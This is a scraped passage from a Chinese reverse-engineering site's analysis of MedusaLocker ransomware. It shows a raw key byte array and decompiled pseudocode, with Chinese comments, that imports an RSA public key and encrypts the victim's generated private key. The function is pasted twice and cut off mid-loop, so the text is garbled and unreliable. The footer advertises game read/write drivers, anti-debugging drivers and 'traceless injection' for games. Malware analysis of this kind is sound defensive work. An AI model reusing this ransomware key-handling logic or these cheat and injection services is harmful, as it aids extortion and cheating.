0x6C, 0xB1, 0x3C, 0x9D, 0x5C, 0xB1, 0xC1, 0x3E, 0xD1, 0x98,
0x71, 0xDF, 0xCF, 0x6B, 0x84, 0x82, 0xBC, 0x87, 0xD1, 0xFA,
0x86, 0xA5, 0xC5, 0x56, 0x93, 0x63, 0x1A, 0x9F, 0xEC, 0xB3,
0xD9, 0xBB, 0x98, 0x65, 0x2F, 0xAC, 0xD2, 0x24, 0x59, 0xC2,
0x3D, 0x83, 0x7A, 0xC3, 0xB5, 0x60, 0xF2, 0x45, 0x62, 0x13,
0x2B, 0x4A, 0x15, 0x2D, 0x62, 0x04, 0xE4, 0x81, 0x00, 0xF1,
0x8C, 0x55, 0xD1, 0x78, 0xAD, 0x0E, 0x31, 0x47, 0xC6, 0x5F,
0x84, 0x2E, 0x00, 0x94, 0x71, 0x9C, 0x13, 0xB2, 0xB8, 0x6E,
0x52, 0x5C, 0x62, 0xD4, 0x12, 0x98, 0xD9, 0x83, 0x2E, 0xAF,
0x21, 0x1E, 0xF9, 0xAC, 0xF6, 0xE1, 0xFA, 0xAF, 0x59, 0xFE,
0x55, 0x29, 0x67, 0x4C, 0xC8, 0x0C, 0x75, 0x11, 0x42, 0x8A,
0x6B, 0xA7, 0x00, 0xDA, 0xF7, 0x4E, 0x1A, 0x53, 0x6C, 0x63,
0x84, 0x8A, 0xF2, 0xC3, 0xEC, 0x62, 0xE3, 0x6D, 0x33, 0x55,
0x82, 0x16, 0xFE, 0xC8, 0x76, 0x79, 0x8A, 0x2C, 0x26, 0x43,
0xBF, 0xCA, 0x8C, 0xBF, 0x77, 0x7E, 0xE9, 0xB8, 0xBC, 0xB4,
0x28, 0xB6, 0xAD, 0xF6, 0x5B, 0x43, 0x85, 0xA8, 0x62, 0x12,
0xF9, 0x27, 0x92, 0xC9, 0x52, 0x66, 0x34, 0x5B, 0x60, 0xA2,
0x7F, 0x57, 0xC1, 0x2A, 0x30, 0xCD, 0x81, 0xA6, 0x1E, 0x3C,
0x03, 0x39, 0x87, 0x96, 0x9D, 0x31, 0xD4, 0x07, 0xCA, 0xF3,
0x91, 0x97, 0xDF, 0x1C, 0x2F, 0xA3, 0xC4, 0xAE, 0x62, 0x7C,
0x7B, 0x9D, 0x18, 0x14, 0x11, 0xDA, 0x5D, 0x0E, 0xF8, 0xB1,
0x14, 0x92, 0xCA, 0xBC, 0x60, 0xE5, 0x6B, 0x15, 0xBA, 0x93,
0xDD, 0xB3, 0xA5, 0x72, 0xB2, 0x3A, 0x5E, 0xB9, 0x79, 0x5C,
0xAA, 0x8E, 0xDC, 0xFA, 0x94, 0xA5, 0x09, 0x09, 0x27, 0xF0,
0x0B, 0x8E, 0x65, 0x18, 0x57, 0x4D, 0x3F, 0x67, 0x02, 0x81,
0xE2, 0xE6, 0x65, 0x00, 0xC0, 0xF5, 0xEF, 0xB1, 0xA5, 0x39,
0xC6, 0x68, 0x24, 0xAA, 0xB1, 0x32, 0xB0, 0x2F, 0x0D, 0x35,
0x6C, 0x90, 0xB3, 0x0E, 0x2F, 0xE0, 0x59, 0xF1, 0x6F, 0x0C,
0xD5, 0x38, 0x66, 0x3D, 0xFC, 0x32, 0x2A, 0xC8, 0x8F, 0x51,
0x91, 0x3E, 0xCD, 0x30, 0xD1, 0x8C, 0x3D, 0xAB, 0x77, 0x16,
0xAE, 0x74, 0xCE, 0xB4, 0x5C, 0x91, 0xDB, 0xBA, 0xD3, 0x52,
0xAE, 0xCA, 0x38, 0x3B, 0x3C, 0x3E, 0x51, 0xC2, 0x06, 0xAD,
0xF9, 0x1E, 0x2F, 0x3A, 0x8D, 0xEF, 0x2D, 0x1C, 0x96, 0x4B,
0x56, 0xE6, 0x52, 0x3D, 0x33, 0x68, 0x13, 0x26, 0xB4, 0xE4,
0x36, 0x68, 0xD9, 0x23, 0xC6, 0x2A, 0x30, 0xC6, 0x91, 0x88,
0x9C, 0xF0, 0xBA, 0xBD, 0x47, 0xA6, 0x50, 0x79, 0x06, 0xE0,
0xED, 0x10, 0x25, 0x72, 0xEA, 0x72, 0xD5, 0x98, 0x0B, 0xBD,
0xA3, 0x5B, 0x04, 0x21, 0x35, 0x91, 0xB0, 0x5B, 0x4A, 0xB0,
0x28, 0x57, 0x4E, 0xDF, 0x7C, 0x3A, 0x4C, 0x65, 0x1A, 0x82,
0x63, 0x33, 0x34, 0x90, 0xCF, 0x1F, 0xB2, 0x21, 0x25, 0x25,
0xED, 0x7F, 0x22, 0x12, 0x0F, 0xF9, 0xBA, 0x75, 0x2A, 0x13,
0xBC, 0x3A, 0xA0, 0x1D, 0x49, 0xD4, 0xC9, 0x23, 0x70, 0x03,
0x57, 0x33, 0x41, 0x50, 0x32, 0xB3, 0x80, 0x55, 0xA2, 0x54,
0xE1, 0x61, 0xB5, 0x1B, 0x7B, 0xD1, 0xC6, 0x1F, 0xE6, 0x55,
0x58, 0xA9, 0xD9, 0xCC, 0xDA, 0x6F, 0xA4, 0xB8, 0x7D, 0xE3,
0x21, 0x65, 0x20, 0xFC, 0x00, 0x93, 0x4E, 0xE2, 0x11, 0x0B,
0xBE, 0xCD, 0xA4, 0x13, 0xEF, 0x28, 0x5A, 0x3F, 0x4A, 0xE7,
0x09, 0x7C, 0x54, 0x3D, 0x30, 0x71, 0xAD, 0x8B, 0x45, 0x7E,
0xBA, 0x81, 0x2B, 0xE2, 0x22, 0x78, 0x87, 0xD1, 0x6D, 0x67,
0x4D, 0x5D, 0xA2, 0x23, 0x45, 0x7B, 0x0C, 0x68, 0x94, 0xFD,
0x20, 0x82, 0xC4, 0x07, 0x09, 0x9E, 0x14, 0x74, 0xBE, 0xD1,
0x05, 0xC7, 0x7B, 0xA3, 0x8E, 0xCB, 0xEF, 0x6F, 0xBB, 0x3A,
0x13, 0x82, 0x78, 0xAB, 0x49, 0xC1, 0xBA, 0x60, 0xB8, 0xD9,
0x97, 0xC1, 0x41, 0x68, 0x0C, 0x71, 0x1C, 0x52, 0xCF, 0x8A,
0x71, 0xCA, 0x5A, 0x12, 0x9C, 0x43, 0xE3, 0xD1, 0x13, 0xA2,
0xF8, 0x07
v4 = 0LL;
  phProv = 0LL;
  hKey = 0LL;
  v5 = 0;
  pbData = 0;
  pdwDataLen = 4;
  KeyParam = CryptAcquireContextW(&phProv, 0LL, 0LL, 1u, 0xF0000040);//初始化RSA加密对象
  if ( KeyParam )
  {
    KeyParam = CryptImportKey(phProv, *(const BYTE **)a1, *(_DWORD *)(a1 + 8) - *(_DWORD *)a1, 0LL, 0, &hKey);//导入配置文件中的RSA公钥
    if ( KeyParam )
    {
      KeyParam = CryptGetKeyParam(hKey, 8u, (BYTE *)&pbData, &pdwDataLen, 0);
      if ( KeyParam )
      {
        v7 = pbData >> 3 == 11;
        v8 = (pbData >> 3) - 11;
        pbData = v8;
        v9 = v8;
        v10 = 0LL;
        v25 = 0LL;
        v11 = 0LL;
        v26 = 0LL;
        v27 = 0LL;
        if ( !v7 )
        {
          alloc_memory(&v25, v8);
          v10 = (char *)v25;
          memset(v25, 0, (unsigned int)v9);
          v11 = &v10[v9];
          v26 = &v10[v9];
          v8 = pbData;
          v4 = v27;
        }
        v28 = 0LL;
        v29 = 0LL;
        v12 = 0LL;
        while ( 1 )
        {
          v13 = *a2;
          v14 = a2[1] - *a2;
          if ( v8 >= (unsigned __int64)(v14 - v12) )
            v8 = v14 - v5;
          v20 = v8;
          memcpy(v10, (const void *)(v12 + v13), v8);
          v21 = v20 + v5;
          v15 = a2[1] - *a2;
          v12 = v21;
          pdwDataLen = v20;
          Final = v21 == v15;
          KeyParam = CryptEncrypt(hKey, 0LL, Final, 0, 0LL, &pdwDataLen, 0);
          if ( !KeyParam )
            break;
          if ( pdwDataLen > (unsigned __int64)(v11 - v10) )
          {
            if ( pdwDataLen <= (unsigned __int64)(v4 - (_QWORD)v10) )
            {
              v16 = pdwDataLen - (v11 - v10);
              memset(v11, 0, v16);
              v11 += v16;
              v26 = v11;
            }
            else
            {
              sub_7FF6BE635790((__int64)&v25, pdwDataLen);
              v4 = v27;
              v11 = v26;
              v10 = (char *)v25;
            }
          }
          KeyParam = CryptEncrypt(hKey, 0LL, Final, 0, (BYTE *)v10, &v20, (_DWORD)v11 - (_DWORD)v10);//加密生成的RSA的私钥
          if ( !KeyParam )
            break;
          sub_7FF6BE635550(&v28, *((_QWORD *)&v28 + 1), v10, v20);
          if ( v12 == v15 )
            break;
          v8 = pbData;
          v5 = v21;
        }
        sub_7FF6BE635410(a2, &v28);
        v17 = (void *)v28;
        if ( (_QWORD)v28 )
        {
          if ( (unsigned __int64)(v29 - v28) >= 0x1000 )
          {
            v17 = *(void **)(v28 - 8);
            if ( (unsigned __int64)(v28 - (_QWORD)v17 - 8) > 0x1F )
              invalid_parameter_noinfo_noreturn();
          }
          j_j_free(v17);
        }
        if ( v10 )
        {
          v18 = v10;
          if ( (unsigned __int64)(v4 - (_QWORD)v10) >= 0x1000 )
          {
            v10 = (char *)*((_QWORD *)v10 - 1);
            if ( (unsigned __int64)(v18 - v10 - 8) > 0x1F )
              invalid_parameter_noinfo_noreturn();
          }
          j_j_free(v10);
        }
      }
    }
  }
  if ( hKey )//清理资源
    CryptDestroyKey(hKey);
  if ( phProv )
    CryptReleaseContext(phProv, 0);
  return KeyParam;
}
v4 = 0LL;
  phProv = 0LL;
  hKey = 0LL;
  v5 = 0;
  pbData = 0;
  pdwDataLen = 4;
  KeyParam = CryptAcquireContextW(&phProv, 0LL, 0LL, 1u, 0xF0000040);//初始化RSA加密对象
  if ( KeyParam )
  {
    KeyParam = CryptImportKey(phProv, *(const BYTE **)a1, *(_DWORD *)(a1 + 8) - *(_DWORD *)a1, 0LL, 0, &hKey);//导入配置文件中的RSA公钥
    if ( KeyParam )
    {
      KeyParam = CryptGetKeyParam(hKey, 8u, (BYTE *)&pbData, &pdwDataLen, 0);
      if ( KeyParam )
      {
        v7 = pbData >> 3 == 11;
        v8 = (pbData >> 3) - 11;
        pbData = v8;
        v9 = v8;
        v10 = 0LL;
        v25 = 0LL;
        v11 = 0LL;
        v26 = 0LL;
        v27 = 0LL;
        if ( !v7 )
        {
          alloc_memory(&v25, v8);
          v10 = (char *)v25;
          memset(v25, 0, (unsigned int)v9);
          v11 = &v10[v9];
          v26 = &v10[v9];
          v8 = pbData;
          v4 = v27;
        }
        v28 = 0LL;
        v29 = 0LL;
        v12 = 0LL;
        while ( 1 )
        {
          v13 = *a2;
          v14 = a2[1] - *a2;
          if ( v8 >= (unsigned __int64)(v14 - v12) )
            v8 = v14 - v5;
          v20 = v8;
          memcpy(v10, (const void *)(v12 + v13), v8);
          v21 = v20 + v5;
          v15 = a2[1] - *a2;
          v12 = v21;
          pdwDataLen = v20;
          Final = v21 == v15;
          KeyParam = CryptEncrypt(hKey, 0LL, Final, 0, 0LL, &pdwDataLen, 0);
          if ( !KeyParam )
            break;
          if ( pdwDataLen > (unsigned __int64)(v11 - v10) )
          {
            if ( pdwDataLen <= (unsigned __int64)(v4 - (_QWORD)v10) )
            {
              v16 = pdwDataLen - (v11 - v10);
              memset(v11, 0, v16);
              v11 += v16;
              v26 = v11;
            }


更多【软件逆向-【病毒分析】深入剖析MedusaLocker勒索家族:从密钥生成到文件加密的全链路解析】相关视频教程:www.yxfzedu.com




相关文章推荐

记录自己的技术轨迹
文章规则:
1):文章标题请尽量与文章内容相符
2):严禁色情、血腥、暴力
3):严禁发布任何形式的广告贴
4):严禁发表关于中国的政治类话题
5):严格遵守中国互联网法律法规
6):有侵权,疑问可发邮件至service@yxfzedu.com
近期原创 更多

Markdown Editor

友情链接
内核结构FAQ
免责声明
课程目录
Windows内核
游戏逆向(FPS)
技术交流QQ群
342478842215039827137189196
314055665159620936
www.yxfzedu.com是一个分享游戏安全,游戏外挂与反外挂,游戏驱动保护的视频网站!
接各种驱动定制如:游戏读写驱动,软件内存保护,防止调试等功能定制。
出租读写驱动,调试驱动,无痕注入支持各种游戏。
邮箱:service@yxfzedu.com
QQ:851920120
特别说明:不接游戏数据分析,外挂编写,登陆协议等类似业务。